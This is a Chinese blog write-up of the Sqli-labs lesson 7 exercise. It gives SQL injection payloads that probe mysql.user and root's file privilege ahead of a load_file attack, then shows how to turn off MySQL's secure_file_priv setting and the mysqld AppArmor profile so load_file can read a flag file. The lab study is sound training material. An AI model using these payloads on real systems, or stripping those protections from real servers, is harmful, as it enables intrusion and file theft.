使用条件:
A、必须有权限读取并且文件必须完全可读
and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。
and (select count(*) from mysql.user)>0/* 返回错误,应该是管理员给数据库帐户降权
(注,上面两段话有争议,具体请看另一篇博客)
B、欲读取文件必须在服务器上 "
当时为了保证转载的完整性,仅仅标注了质疑,这次借用这篇博客,同时在查阅大量资料的情况下阐述自己的观点。
and (select count(*) from mysql.user)>0它的返回值来判断是否有读写文件的权限有失全面。原因有两点:
1.mysql.user本身是一张保存用户权限的表,里面包含了登入mysql数据库的各个账号的权限,其结构如下:
mysql> desc mysql.user;
+------------------------+-----------------------------------+------+-----+----- ----+-------+
| Field | Type | Null | Key | Defa ult | Extra |
+------------------------+-----------------------------------+------+-----+----- ----+-------+
| Host | char(60) | NO | PRI | | |
| User | char(16) | NO | PRI | | |
| Password | char(41) | NO | | | |
| Select_priv | enum('N','Y') | NO | | N | |
| Insert_priv | enum('N','Y') | NO | | N | |
...
| File_priv | enum('N','Y') | NO | | N | |
+------------------------+-----------------------------------+------+-----+----- 其中包含了用户名/密码/执行增删改查的权限,同时也包括了文件权限。执行(select count(*) from mysql.user)>0,并返回TRUE,个人觉得仅仅说明当前登入mysql的用户有访问mysql.user这张表的权限,同时表中内容非空。
2.想确定某一用户是否有操作文件的权限,可能需要执行下列语句:
2.1.获得当前登入mysql的用户:
mysql> select user();
+--------+
| user() |
+--------+
| root@ |
+--------+
1 row in set (0.00 sec)2.2.获得该用户的文件权限:
mysql> select ((select file_priv from mysql.user where user='root' limit 0,1)='Y')as priv;
+------+
| priv |
+------+
| 1 |
+------+
1 row in set (0.00 sec)进入主题,Sqli-labs练习7后台获取id的PHP语句如下:
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);如果URL中输入有效的ID,页面如下:
否则,页面呈现这样的结果:
在执行Load_file前需要准备3种payload:
1.mysql.user的访问权限:
1')) and (select count(*) from mysql.user)>0 -- 
当前用户可以访问mysql.user表
2.获取用户:
目前获取用户只能通过盲注,盲注的结果显示当前用户是:root
3.判断用户有文件权限:
1')) and (select (select file_priv from mysql.user where user='root' limit 0,1)='Y') -- 
经历以上步骤后,可以确定root用户具有操作文件的权限,接下来才能执行Load_file注入。
参考资料:MySQL Injection - Simple Load File and Into OutFile
=======================================
后记:
对于新版本的MySQL,即使当前用户拥有操作文件的权限,调用load_file以后仍有可能会返回NULL。我曾尝试在/var/www/html目录下创建一个文本文件:
执行load_file的结果如下:
mysql> select user, file_priv from mysql.user;
+------------------+-----------+
| user | file_priv |
+------------------+-----------+
| root | Y |
| root | Y |
| root | Y |
| root | Y |
| debian-sys-maint | Y |
+------------------+-----------+
5 rows in set (0.00 sec)
mysql> select load_file('/var/www/html/flag.txt');
+-------------------------------------+
| load_file('/var/www/html/flag.txt') |
+-------------------------------------+
| NULL |
+-------------------------------------+
1 row in set (0.00 sec)
查找了很多页面才了解到,高版本的mysql引入了secure-file-priv特性。secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。
1.当ure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
2.当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;
3.当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制。
此开关默认为NULL,即不允许导入导出。查看secure-file-priv参数的值:
mysql> show global variables like '%secure%';
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_auth | OFF |
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
2 rows in set (0.00 sec)
解决方案:
windows下:修改my.ini 在[mysqld]内加入secure_file_priv =
linux下:修改my.cnf 在[mysqld]内加入secure_file_priv =
然后重启mysql,再查询secure_file_priv
mysql> show global variables like '%secure%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | |
+------------------+-------+
2 rows in set (0.00 sec)
mysql> select load_file('/var/www/html/flag.txt');
+-------------------------------------+
| load_file('/var/www/html/flag.txt') |
+-------------------------------------+
| flag!
|
+-------------------------------------+
1 row in set (0.00 sec)
$ sudo apparmor_status
apparmor module is loaded.
6 profiles are loaded.
6 profiles are in enforce mode.
/sbin/dhclient
/usr/lib/NetworkManager/nm-dhcp-client.action
/usr/lib/connman/scripts/dhclient-script
/usr/sbin/mysqld
/usr/sbin/ntpd
/usr/sbin/tcpdump
0 profiles are in complain mode.
2 processes have profiles defined.
2 processes are in enforce mode.
/usr/sbin/mysqld (27816)
/usr/sbin/ntpd (31952)
0 processes are in complain mode.
0 processes are unconfined but have a profile defined.sudo ln -s /etc/apparmor.d/{profile.name-here} /etc/apparmor.d/disable/
sudo apparmor_parser -R /etc/apparmor.d/{profile.name-name-here}sudo ln -s /etc/apparmor.d/usr.sbin.mysqld /etc/apparmor.d/disable/
sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqldsudo aa-status
apparmor module is loaded.
5 profiles are loaded.
5 profiles are in enforce mode.
/sbin/dhclient
/usr/lib/NetworkManager/nm-dhcp-client.action
/usr/lib/connman/scripts/dhclient-script
/usr/sbin/ntpd
/usr/sbin/tcpdump
0 profiles are in complain mode.
1 processes have profiles defined.
1 processes are in enforce mode.
/usr/sbin/ntpd (31952)
0 processes are in complain mode.
0 processes are unconfined but have a profile defined.sudo rm /etc/apparmor.d/disable/usr.sbin.mysqld
sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.mysqld
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
